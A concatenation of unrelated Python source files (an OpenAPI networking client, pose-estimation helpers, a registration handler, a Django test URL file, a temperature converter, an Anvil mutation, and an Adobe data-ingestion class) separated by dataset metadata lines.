Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag_id'] = \
tag_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag/{tagId}',
'operation_id': 'networking_project_netgw_tag_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'tag_id': 'tagId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_tag_delete
)
def __networking_project_netgw_tag_get(
self,
project_id,
location_id,
netgw_id,
tag_id,
**kwargs
):
"""Get networking/netgw.tag # noqa: E501
Get networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_get(project_id, location_id, netgw_id, tag_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag_id (str): tagId
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Tag
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag_id'] = \
tag_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_get = _Endpoint(
settings={
'response_type': (Tag,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag/{tagId}',
'operation_id': 'networking_project_netgw_tag_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'tag_id': 'tagId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_tag_get
)
def __networking_project_netgw_tag_list(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""List networking/netgw.tag # noqa: E501
List networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_list(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Tag]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_list = _Endpoint(
settings={
'response_type': ([Tag],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag',
'operation_id': 'networking_project_netgw_tag_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_tag_list
)
def __networking_project_netgw_tag_put(
self,
project_id,
location_id,
netgw_id,
tag_array,
**kwargs
):
"""Replace networking/netgw.tag # noqa: E501
Replace networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_put(project_id, location_id, netgw_id, tag_array, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag_array (TagArray):
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Tag]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag_array'] = \
tag_array
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_put = _Endpoint(
settings={
'response_type': ([Tag],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag',
'operation_id': 'networking_project_netgw_tag_put',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag_array',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag_array',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag_array':
(TagArray,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag_array': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_tag_put
)
def __networking_project_netgw_update(
self,
project_id,
location_id,
netgw_id,
networking_project_netgw_update,
**kwargs
):
"""Update networking/netgw # noqa: E501
Returns modified netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_update(project_id, location_id, netgw_id, networking_project_netgw_update, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
networking_project_netgw_update (NetworkingProjectNetgwUpdate):
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['networking_project_netgw_update'] = \
networking_project_netgw_update
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_update = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}',
'operation_id': 'networking_project_netgw_update',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_update',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_update',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'networking_project_netgw_update':
(NetworkingProjectNetgwUpdate,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'networking_project_netgw_update': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_update
)
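        # Usage sketch (illustrative only): the endpoints defined above are exposed as attributes on
        # the enclosing API class instance. The client class name, the project/location/netgw ids and
        # the "api_client" variable below are placeholders, not values taken from this file.
        #
        #     api = <ThisNetgwApiClass>(api_client)
        #     gw = api.networking_project_netgw_get("my-project", "my-location", "my-netgw")
        #     events = api.networking_project_netgw_event_list("my-project", "my-location", "my-netgw", limit=10)
        #     api.networking_project_netgw_delete("my-project", "my-location", "my-netgw")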
| 1.96875
| 2
|
src/pose_estimator/utils.py
|
Liang813/GaitGraph
| 57
|
12775588
|
<filename>src/pose_estimator/utils.py<gh_stars>10-100
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by <NAME> (<EMAIL>)
# ------------------------------------------------------------------------------
import math
import numpy as np
import cv2
def transform_preds(coords, center, scale, output_size):
target_coords = np.zeros(coords.shape)
trans = get_affine_transform(center, scale, 0, output_size, inv=1)
for p in range(coords.shape[0]):
target_coords[p, 0:2] = affine_transform(coords[p, 0:2], trans)
return target_coords
def get_affine_transform(
center, scale, rot, output_size,
shift=np.array([0, 0], dtype=np.float32), inv=0
):
if not isinstance(scale, np.ndarray) and not isinstance(scale, list):
print(scale)
scale = np.array([scale, scale])
scale_tmp = scale * 200.0
src_w = scale_tmp[0]
dst_w = output_size[0]
dst_h = output_size[1]
rot_rad = np.pi * rot / 180
src_dir = get_dir([0, src_w * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :] = center + scale_tmp * shift
src[1, :] = center + src_dir + scale_tmp * shift
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5]) + dst_dir
src[2:, :] = get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def affine_transform(pt, t):
new_pt = np.array([pt[0], pt[1], 1.]).T
new_pt = np.dot(t, new_pt)
return new_pt[:2]
def get_3rd_point(a, b):
direct = a - b
return b + np.array([-direct[1], direct[0]], dtype=np.float32)
def get_dir(src_point, rot_rad):
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
src_result = [0, 0]
src_result[0] = src_point[0] * cs - src_point[1] * sn
src_result[1] = src_point[0] * sn + src_point[1] * cs
return src_result
def get_max_preds(batch_heatmaps):
"""
get predictions from score maps
heatmaps: numpy.ndarray([batch_size, num_joints, height, width])
"""
assert isinstance(batch_heatmaps, np.ndarray), \
'batch_heatmaps should be numpy.ndarray'
    assert batch_heatmaps.ndim == 4, 'batch_heatmaps should be 4-ndim'
batch_size = batch_heatmaps.shape[0]
num_joints = batch_heatmaps.shape[1]
width = batch_heatmaps.shape[3]
heatmaps_reshaped = batch_heatmaps.reshape((batch_size, num_joints, -1))
idx = np.argmax(heatmaps_reshaped, 2)
maxvals = np.amax(heatmaps_reshaped, 2)
maxvals = maxvals.reshape((batch_size, num_joints, 1))
idx = idx.reshape((batch_size, num_joints, 1))
preds = np.tile(idx, (1, 1, 2)).astype(np.float32)
preds[:, :, 0] = (preds[:, :, 0]) % width
preds[:, :, 1] = np.floor((preds[:, :, 1]) / width)
pred_mask = np.tile(np.greater(maxvals, 0.0), (1, 1, 2))
pred_mask = pred_mask.astype(np.float32)
preds *= pred_mask
return preds, maxvals
def get_final_preds(config, batch_heatmaps, center, scale):
coords, maxvals = get_max_preds(batch_heatmaps)
heatmap_height = batch_heatmaps.shape[2]
heatmap_width = batch_heatmaps.shape[3]
# post-processing
if config.TEST.POST_PROCESS:
for n in range(coords.shape[0]):
for p in range(coords.shape[1]):
hm = batch_heatmaps[n][p]
px = int(math.floor(coords[n][p][0] + 0.5))
py = int(math.floor(coords[n][p][1] + 0.5))
if 1 < px < heatmap_width-1 and 1 < py < heatmap_height-1:
diff = np.array(
[
hm[py][px+1] - hm[py][px-1],
hm[py+1][px]-hm[py-1][px]
]
)
coords[n][p] += np.sign(diff) * .25
preds = coords.copy()
# Transform back
for i in range(coords.shape[0]):
preds[i] = transform_preds(
coords[i], center[i], scale[i], [heatmap_width, heatmap_height]
)
return preds, maxvals
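# Minimal usage sketch (hypothetical values; "img" is assumed to be an image array loaded elsewhere):
# warp a person crop to the network input size and map heatmap peaks back to image coordinates.
#
#     center = np.array([320.0, 240.0], dtype=np.float32)  # box center in the original image
#     scale = np.array([1.28, 0.96], dtype=np.float32)     # box size / 200, per the scale_tmp convention above
#     trans = get_affine_transform(center, scale, 0, [192, 256])
#     crop = cv2.warpAffine(img, trans, (192, 256), flags=cv2.INTER_LINEAR)
#     # heatmap coordinates (e.g. 48x64 maps) map back via transform_preds(coords, center, scale, [48, 64])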
| 2.28125
| 2
|
arts-main/handlers/registration.py
|
SilverLineFramework/orchestrator
| 0
|
12775589
|
<reponame>SilverLineFramework/orchestrator
"""Runtime registration."""
from pubsub import messages
from arts_core.serializers import RuntimeSerializer
from arts_core.models import Runtime
from .base import BaseHandler
class Registration(BaseHandler):
"""Runtime registration."""
def handle(self, msg):
"""Handle registration message."""
if msg.get('type') == 'arts_resp':
return None
print("[Registration] {}".format(msg.payload))
action = msg.get('action')
if action == 'create':
runtime = self._object_from_dict(Runtime, msg.get('data'))
runtime.save()
self.callback("create_runtime", runtime)
return messages.Response(
msg.topic, msg.get('object_id'),
RuntimeSerializer(runtime, many=False).data)
elif action == 'delete':
runtime = self._get_object(msg.get('data', 'uuid'), model=Runtime)
body = RuntimeSerializer(runtime, many=False).data
runtime.delete()
self.callback("delete_runtime", runtime)
return messages.Response(msg.topic, msg.get('object_id'), body)
else:
raise messages.InvalidArgument("action", msg.get('action'))
| 2.125
| 2
|
mkt/api/tests/test_base_urls.py
|
clouserw/zamboni
| 0
|
12775590
|
<gh_stars>0
"""Some URLs for test_base.py"""
from django.conf.urls import patterns, url
from rest_framework.decorators import (authentication_classes,
permission_classes)
from rest_framework.response import Response
from mkt.api.base import cors_api_view
@cors_api_view(['POST'], headers=('x-barfoo', 'x-foobar'))
@authentication_classes([])
@permission_classes([])
def _test_cors_api_view(request):
return Response()
urlpatterns = patterns(
'',
url(r'^test-cors-api-view/', _test_cors_api_view,
name='test-cors-api-view'),
)
| 1.8125
| 2
|
ConversortemperaturaFahrenheit .py
|
Reloure/curso_basico_python
| 0
|
12775591
|
<gh_stars>0
temperaturaFahrenheit = input("Digite uma temperatura em Fahrenheit: ")
temperaturaCelsius = (float(temperaturaFahrenheit) -32) * 5/9
print("A temperatura em celsius é",temperaturaCelsius)
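# Worked example / exemplo: 212 °F -> (212 - 32) * 5/9 = 100.0 °C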
| 3.703125
| 4
|
python_anvil/api_resources/mutations/generate_etch_signing_url.py
|
anvilco/python-anvil
| 4
|
12775592
|
<reponame>anvilco/python-anvil
from python_anvil.api_resources.mutations.base import BaseQuery
from python_anvil.api_resources.payload import GenerateEtchSigningURLPayload
class GenerateEtchSigningURL(BaseQuery):
"""Query class to handle retrieving a signing URL."""
mutation = """
mutation ($signerEid: String!, $clientUserId: String!) {
generateEtchSignURL (signerEid: $signerEid, clientUserId: $clientUserId)
}
"""
def __init__(self, signer_eid: str, client_user_id: str):
self.signer_eid = signer_eid
self.client_user_id = client_user_id
def create_payload(self):
return GenerateEtchSigningURLPayload(
signer_eid=self.signer_eid, client_user_id=self.client_user_id
)
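# Usage sketch (illustrative): build the query object and produce its payload. The ids below are
# placeholders, and sending the mutation through an Anvil API client is not shown in this file.
#
#     query = GenerateEtchSigningURL(signer_eid="signer-eid-123", client_user_id="user-42")
#     payload = query.create_payload()  # variables for the GraphQL mutation above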
| 2.46875
| 2
|
aepp/ingestion.py
|
benedikt-buchert/aepp
| 9
|
12775593
|
import aepp
from aepp import connector
from copy import deepcopy
import requests
from typing import IO, Union
import logging
class DataIngestion:
"""
Class that manages sending data via authenticated methods.
For Batch and Streaming messages.
"""
loggingEnabled = False
logger = None
def __init__(
self,
config: dict = aepp.config.config_object,
header=aepp.config.header,
loggingObject: dict = None,
**kwargs,
):
"""
        Instantiate the DataIngestion class.
Arguments:
config : OPTIONAL : config object in the config module.
header : OPTIONAL : header object in the config module.
Additional kwargs will update the header.
"""
if loggingObject is not None and sorted(
["level", "stream", "format", "filename", "file"]
) == sorted(list(loggingObject.keys())):
self.loggingEnabled = True
self.logger = logging.getLogger(f"{__name__}")
self.logger.setLevel(loggingObject["level"])
formatter = logging.Formatter(loggingObject["format"])
if loggingObject["file"]:
fileHandler = logging.FileHandler(loggingObject["filename"])
fileHandler.setFormatter(formatter)
self.logger.addHandler(fileHandler)
if loggingObject["stream"]:
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
self.logger.addHandler(streamHandler)
self.connector = connector.AdobeRequest(config_object=config, header=header)
self.header = self.connector.header
self.header.update(**kwargs)
self.sandbox = self.connector.config["sandbox"]
self.endpoint = (
aepp.config.endpoints["global"] + aepp.config.endpoints["ingestion"]
)
self.endpoint_streaming = aepp.config.endpoints["streaming"]["collection"]
self.STREAMING_REFERENCE = {
"header": {
"schemaRef": {
"id": "https://ns.adobe.com/{TENANT_ID}/schemas/{SCHEMA_ID}",
"contentType": "application/vnd.adobe.xed-full+json;version={SCHEMA_VERSION}",
},
"imsOrgId": "{IMS_ORG_ID}",
"datasetId": "{DATASET_ID}",
"createdAt": "1526283801869",
"source": {"name": "{SOURCE_NAME}"},
},
"body": {
"xdmMeta": {
"schemaRef": {
"id": "https://ns.adobe.com/{TENANT_ID}/schemas/{SCHEMA_ID}",
"contentType": "application/vnd.adobe.xed-full+json;version={SCHEMA_VERSION}",
}
},
"xdmEntity": {
"person": {
"name": {
"firstName": "Jane",
"middleName": "F",
"lastName": "Doe",
},
"birthDate": "1969-03-14",
"gender": "female",
},
"workEmail": {
"primary": True,
"address": "<EMAIL>",
"type": "work",
"status": "active",
},
},
},
}
def createBatch(
self,
datasetId: str = None,
format: str = "json",
multiline: bool = False,
enableDiagnostic: bool = False,
partialIngestionPercentage: int = 0,
) -> dict:
"""
Create a new batch in Catalog Service.
Arguments:
datasetId : REQUIRED : The Dataset ID for the batch to upload data to.
            format : REQUIRED : the format of the data sent (default json).
            multiline : OPTIONAL : If you wish to upload multi-line JSON.
            enableDiagnostic : OPTIONAL : If True, enable error diagnostics for the batch.
            partialIngestionPercentage : OPTIONAL : Error threshold (in percent) tolerated before the batch is failed.
"""
if datasetId is None:
raise ValueError("Require a dataSetId")
if self.loggingEnabled:
self.logger.debug(f"Using createBatch with following format ({format})")
obj = {
"datasetId": datasetId,
"inputFormat": {"format": format, "isMultiLineJson": False},
}
if multiline is True:
obj["inputFormat"]["isMultiLineJson"] = True
if enableDiagnostic != False:
obj["enableErrorDiagnostics"] = True
if partialIngestionPercentage > 0:
obj["partialIngestionPercentage"] = partialIngestionPercentage
path = "/batches"
res = self.connector.postData(self.endpoint + path, data=obj)
return res
def deleteBatch(self, batchId: str = None) -> str:
"""
Delete a batch by applying the revert action on it.
Argument:
batchId : REQUIRED : Batch ID to be deleted
"""
if batchId is None:
raise ValueError("Require a batchId argument")
if self.loggingEnabled:
self.logger.debug(f"Starting deleteBatch for ID: ({batchId})")
path = f"/batches/{batchId}"
params = {"action": "REVERT"}
res = self.connector.postData(self.endpoint + path, params=params)
return res
def replayBatch(self, datasetId: str = None, batchIds: list = None) -> dict:
"""
        You can replay a batch that has already been ingested. You need to provide the datasetId and the list of batches to be replayed.
        Once specified through that action, you will need to re-upload the batch data via the uploadSmallFile method in JSON format and then signal completion.
You will need to re-use the batchId provided for the re-upload.
Arguments:
            datasetId : REQUIRED : The dataset ID attached to the batch
            batchIds : REQUIRED : The list of batch IDs to replay.
"""
if datasetId is None:
raise ValueError("Require a dataset ID")
if batchIds is None or type(batchIds) != list:
raise ValueError("Require a list of batch ID")
if self.loggingEnabled:
self.logger.debug(f"Starting replayBatch for dataset ID: ({datasetId})")
path = "/batches"
predecessors = [f"${batchId}" for batchId in batchIds]
data = {
"datasetId": datasetId,
"inputFormat": {"format": "json"},
"replay": {"predecessors": predecessors, "reason": "replace"},
}
res = self.connector.patchData(self.endpoint + path, data=data)
return res
def uploadSmallFile(
self,
batchId: str = None,
datasetId: str = None,
filePath: str = None,
data: Union[list, dict] = None,
verbose: bool = False,
) -> dict:
"""
Upload a small file (<256 MB) to the filePath location in the dataset.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
filePath : REQUIRED : the filePath that will store the value.
            data : REQUIRED : The data to be uploaded (following the type provided). List or Dictionary, depending on whether multiline is enabled.
            verbose : OPTIONAL : if you wish to see comments around the upload (default False).
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
if data is None:
raise Exception("require data to be passed")
if verbose:
print(f"Your data is in {type(data)} format")
if self.loggingEnabled:
self.logger.debug(f"uploadSmallFile as format: ({type(data)})")
privateHeader = deepcopy(self.header)
privateHeader["Content-Type"] = "application/octet-stream"
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = self.connector.putData(
self.endpoint + path, data=data, headers=privateHeader
)
return res
def uploadSmallFileFinish(
self, batchId: str = None, action: str = "COMPLETE", verbose: bool = False
) -> dict:
"""
Send an action to signify that the import is done.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
action : REQUIRED : either one of these actions:
COMPLETE (default value)
ABORT
FAIL
REVERT
"""
if batchId is None:
raise Exception("require a batchId")
if action is None or action not in ["COMPLETE", "ABORT", "FAIL", "REVERT"]:
raise Exception("Not a valid action has been passed")
path = f"/batches/{batchId}"
if self.loggingEnabled:
self.logger.debug(f"Finishing upload for batch ID: ({batchId})")
params = {"action": action}
res = self.connector.postData(
self.endpoint + path, params=params, verbose=verbose
)
return res
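    # Illustrative small-file ingestion flow (sketch only): the dataset id, the file path and the
    # "id" key assumed on the createBatch response are placeholders/assumptions, not guarantees.
    #
    #     ingestion = DataIngestion()
    #     batch = ingestion.createBatch(datasetId="my-dataset-id")
    #     ingestion.uploadSmallFile(batchId=batch["id"], datasetId="my-dataset-id",
    #                               filePath="part1.json", data=[{"key": "value"}])
    #     ingestion.uploadSmallFileFinish(batchId=batch["id"], action="COMPLETE")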
def uploadLargeFileStartEnd(
self,
batchId: str = None,
datasetId: str = None,
filePath: str = None,
action: str = "INITIALIZE",
) -> dict:
"""
Start / End the upload of a large file with a POST method defining the action (see parameter)
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
filePath : REQUIRED : the filePath that will store the value.
action : REQUIRED : Action to either INITIALIZE or COMPLETE the upload.
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
params = {"action": action}
if self.loggingEnabled:
self.logger.debug(
f"Starting or Ending large upload for batch ID: ({batchId})"
)
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = self.connector.postData(self.endpoint + path, params=params)
return res
def uploadLargeFilePart(
self,
batchId: str = None,
datasetId: str = None,
filePath: str = None,
data: bytes = None,
contentRange: str = None,
) -> dict:
"""
Continue the upload of a large file with a PATCH method.
Arguments:
            batchId : REQUIRED : The batchId referencing the batch created beforehand.
            datasetId : REQUIRED : The datasetId of the dataset the data is ingested into.
filePath : REQUIRED : the filePath that will store the value.
data : REQUIRED : The data to be uploaded (in bytes)
contentRange : REQUIRED : The range of bytes of the file being uploaded with this request.
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
if data is None:
raise Exception("require data to be passed")
if contentRange is None:
raise Exception("require the content range to be passed")
privateHeader = deepcopy(self.header)
privateHeader["Content-Type"] = "application/octet-stream"
privateHeader["Content-Range"] = contentRange
if self.loggingEnabled:
self.logger.debug(f"Uploading large part for batch ID: ({batchId})")
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = requests.patch(self.endpoint + path, data=data, headers=privateHeader)
res_json = res.json()
return res_json
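    # Hypothetical sketch of the large-file flow (placeholders throughout; the Content-Range
    # value follows the standard HTTP "bytes start-end/total" form and should be checked
    # against the API documentation):
    # ingestion.uploadLargeFileStartEnd(batchId, datasetId, "big.json", action="INITIALIZE")
    # with open("big.json", "rb") as f:
    #     chunk = f.read()
    # ingestion.uploadLargeFilePart(batchId, datasetId, "big.json", data=chunk,
    #                               contentRange=f"bytes 0-{len(chunk) - 1}/{len(chunk)}")
    # ingestion.uploadLargeFileStartEnd(batchId, datasetId, "big.json", action="COMPLETE")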
def headFileStatus(
self, batchId: str = None, datasetId: str = None, filePath: str = None
) -> dict:
"""
Check the status of a large file upload.
Arguments:
